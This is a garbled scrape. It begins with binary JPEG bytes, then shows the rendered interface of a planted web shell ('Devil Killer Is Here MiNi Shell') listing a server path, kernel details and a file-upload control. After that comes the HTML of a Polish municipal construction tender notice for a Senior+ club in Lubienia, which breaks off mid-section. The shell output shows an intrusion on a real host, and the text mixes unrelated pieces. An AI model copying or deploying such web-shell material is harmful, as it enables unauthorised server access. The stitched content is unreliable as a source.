JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210824/0015874201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie i wyposażenie Klubu Senior+ w miejscowości Lubienia, przy ulicy Wiejskiej 38 (roboty budowlane) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA POPIELÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Opolska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Popielów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-090</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774275822</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774275838</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@popielow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.popielow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie i wyposażenie Klubu Senior+ w miejscowości Lubienia, przy ulicy Wiejskiej 38 (roboty budowlane) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22fd177c-04bb-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00158742</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000905/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Utworzenie i wyposażenie Klubu Senior+ w miejscowości Lubienia, przy ulicy Wiejskiej 38 (roboty budowlane)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.popielow.pl/193/110/przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">11.1.1. W postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie<br/>przy użyciu:<br/>1) miniPortalu, dostępnego pod adresem: https://miniportal.uzp.gov.pl/,<br/>2) ePUAPu: dostępnego pod adresem: https://epuap.gov.pl/wps/portal,<br/>3) poczty elektronicznej;<br/> Zamawiający informuje, że nie przewiduje zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art.<br/>66 i art. 69 Ustawy, tym samym komunikacja odbywać się będzie jw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>1) w zakresie merytorycznym osobą upoważnioną do kontaktu z Wykonawcami jest:<br/> Pan Mateusz Macioszek – Inspektor ds. budownictwa, tel. 77 427 58 51<br/>2) w zakresie proceduralnym osobą upoważnioną do kontaktu z Wykonawcami jest:<br/> Pan Tomasz Jonek – Inspektor ds. budownictwa, tel. 77 427 58 23<br/> Pani Beata Kupczyk-Piechota – Inspektor ds. budownictwa, tel. 77 427 58 52<br/>11.1.3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”.<br/>11.1.4. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej, w tym dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal -<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP) - https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin. Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i<br/>organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika (pkt 1.4. ppkt. 11 SWZ).<br/>Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej<br/>wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę<br/>akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ. W celu<br/>korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem<br/>teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie Windows i<br/>wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń mobilnych oraz Mac lub Linux,<br/>dostęp do wszystkich funkcjonalności systemu miniPortal może być ograniczony.<br/>1) Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru<br/>danych:<br/> specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2,<br/> format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/> oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/> integracja z systemem ePUAP jest wykonana z wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP wsekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>2) System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/> Microsoft Internet Explorer od wersji 9.0,<br/> Mozilla Firefox od wersji 15,<br/> Google Chrome od wersji 20;<br/>11.1.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB.<br/>11.1.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP<br/>Ze względu na ograniczoną ilość znaków, pozostałe wymagania<br/>techniczne i organizacyjne znajdują się w Rozdziale 11 SWZ postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) Administratorem Pani/Pana danych osobowych<br/>przetwarzanych w Urzędzie Gminy w Popielowie z/s ul. Opolska 13, 46-090 Popielów jest Wójt Gminy<br/>Popielów zwany dalej Administratorem Danych Osobowych (ADO).2) W urzędzie Gminy w Popielowie<br/>wyznaczony został Inspektor Ochrony Danych (IOD). Kontakt listowny z IOD: Urząd Gminy w<br/>Popielowie, ul. Opolska 13, 46-090 Popielów, kontakt e-mail: iod@popielow.pl3) Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego.4) Odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.8<br/>oraz art. 96 ust. 3 ustawy Prawo zamówień publicznych (Dalej: Pzp); 5) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; albo 10 lat od czasu rozliczenia dofinansowania<br/>dla przedmiotowego przedmiotu zamówienia - w przypadku zamówień współfinansowanych ze<br/>środków UE chyba, że niezbędny będzie dłuższy okres przetwarzania, np. z uwagi na dochodzenie<br/>roszczeń lub inny obowiązek wymagany przez przepisy prawa powszechnie obowiązującego. Okresy<br/>te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze(nie zawarto z tymi Wykonawcami umowy);6) Obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22RODO;8) Posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO;9) nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa<br/>w art. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane związane z wykonaniem zadania pn.:<br/>Utworzenie i wyposażenie Klubu Senior+ w miejscowości Lubienia, przy ulicy Wiejskiej 38<br/>(roboty budowlane), w ramach Programu Wieloletniego „Senior+” na lata 2021-2025, edycja<br/>2021. Zakres robót budowlanych obejmuje konieczne prace budowlane i instalacyjne, mające na celu<br/>stworzenie odpowiednich pod względem funkcjonalno-użytkowym pomieszczeń. W ramach<br/>przebudowy pomieszczeń powstaną nowe przystosowane do założeń pomieszczenia:<br/> pomieszczenie ogólnodostępne pełniące funkcję sali spotkań z możliwością szybkiej adaptacji<br/>na jadalnię<br/> pomieszczenie kuchenne - aneks kuchenny,<br/> pomieszczenie do utrzymania lub zwiększenia aktywności ruchowej lub kinezyterapii – sala<br/>ćwiczeń ruchowych, rekreacyjnych,<br/> toaleta dla kobiet i osób niepełnosprawnych oraz toaleta dla mężczyzn;<br/>Wszystkie pomieszczenia dostosowane będą do potrzeb osób niepełnosprawnych.<br/>Przebudową zostaną objęte pomieszczenia istniejących sanitariatów oraz pomieszczenia<br/>świetlicy wiejskiej. Pozostałe pomieszczenia objęte będą remontem i robotami<br/>dostosowawczymi.<br/>Wykonana zostanie również zewnętrzna pochylnia dostosowana dla osób niepełnosprawnych w<br/>tym poruszających się na wózkach inwalidzkich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>Ocena oferty (O) – znaczenie 100 pkt<br/>Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>O = C + G<br/>gdzie:<br/>O – suma punktów uzyskanych przez daną ofertę we wszystkich kryteriach<br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Okres gwarancji”<br/>2. Maksymalna liczba punktów, jaką może uzyskać Wykonawca wynosi – 100 punktów. Punkty<br/>przyznane zostaną obliczone dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za<br/>wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty (O).<br/>3. Punkty przyznawane za podane kryterium będą liczone według następujących wzorów:<br/>1) C = CN / COB x 60 % x 100<br/>gdzie: <br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>CN – najniższa zaoferowana cena brutto, spośród ważnych ofert<br/>COB – cena brutto zaoferowana w ofercie badanej<br/>2) G = GOB x 40 % x 100<br/>gdzie:<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Okres gwarancji”<br/>GOB – okres gwarancji podany w badanej ofercie, liczony w miesiącach<br/>1) Wykonawca może zaproponować okres gwarancji (GOB) w następujących okresach:<br/>- 36 miesięcy<br/>- 42 miesiące<br/>- 48 miesięcy<br/>- 54 miesiące<br/>- 60 miesięcy<br/>2) Faktyczna ilość punktów zostanie obliczona następująco (GOB):<br/>- okres gwarancji 36 miesięcy – 0,00 pkt<br/>- okres gwarancji 42 miesiące – 0,25 pkt<br/>- okres gwarancji 48 miesięcy – 0,50 pkt<br/>- okres gwarancji 54 miesiące – 0,75 pkt<br/>- okres gwarancji 60 miesięcy – 1,00 pkt<br/>3) Minimalny wymagany okres gwarancji wynosi 36 miesięcy. Oferta z gwarancją krótszą niż<br/>wymagane minimum zostanie odrzucona jako niezgodna z treścią SWZ (na podstawie art. 226 ust. 1<br/>pkt 5 ustawy).<br/>4) Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny 60<br/>miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń wartość 60 m-cy - najdłuższy<br/>przyjęty w kryterium oceny ofert „Okres gwarancji”.<br/>5) Okres gwarancji dla całego przedmiotu zamówienia liczy się od daty podpisania końcowego<br/>protokołu odbioru całego przedmiotu zamówienia.<br/>6) W przypadku braku podania okresu gwarancji w ofercie, Zamawiający odrzuci ofertę Wykonawcy na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy.<br/>4. Cena oraz okres gwarancji mają wpływ na punktację badanej oferty oraz jej ewentualny wybór jako<br/>oferty najkorzystniejszej. Wykonawca nie może, w trakcie badania i oceny ofert przez Zamawiającego,<br/>dokonać zmiany, poprawy lub uzupełnienia ww. elementów oferty w sposób, który mógłby wpłynąć na<br/>punktację, gdyż naruszałoby to zasady równego traktowania Wykonawców, uczciwej konkurencji oraz<br/>przejrzystości postępowania.<br/>5. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów<br/>wyznaczy najkorzystniejszą ofertę.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (kryterium „Cena”).<br/>6.1. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera<br/>ofertę z najniższą ceną.<br/>6.2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 17.7.1., Zamawiający<br/>wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego<br/>ofert dodatkowych zawierających nową cenę.<br/>6.3. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>złożonych ofertach</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4.	Zdolności technicznej lub zawodowej w zakresie (opis sposobu dokonywania oceny spełniania tego warunku):<br/>1)	Wykonawca winien wykazać, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jedną robotę budowlaną o wartości minimum 150.000,00 zł brutto (sto pięćdziesiąt tysięcy złotych brutto), która polegała na budowie lub przebudowie lub remoncie obiektu kubaturowego.<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji nw. osoby:<br/>a)	Kierownik budowy branży ogólnobudowlanej posiadający uprawnienia do kierowania robotami budowlanymi w zakresie obejmującym przedmiot zamówienia;<br/>6.2.	DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:<br/>1)	Wykonawca 